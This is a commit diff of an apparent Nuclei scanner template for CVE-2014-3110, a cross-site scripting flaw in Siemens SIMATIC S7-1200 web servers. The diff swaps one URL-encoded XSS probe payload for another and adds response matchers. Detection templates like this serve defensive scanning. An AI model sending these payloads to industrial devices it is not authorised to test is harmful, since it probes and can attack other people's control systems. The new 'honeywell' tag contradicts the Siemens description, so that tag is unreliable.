Update CVE-2014-3110.yaml
parent
f8771cea8f
commit
f0fbe930f6
|
@ -5,21 +5,28 @@ info:
|
|||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
||||
reference: https://www.exploit-db.com/exploits/44687
|
||||
tags: cve,cve2014,xss,siemens
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44749
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-3110
|
||||
tags: cve,cve2014,xss,honeywell
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter'
|
||||
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><img src=x onerror=prompt(1);>'
|
||||
|
|
Loading…
Reference in New Issue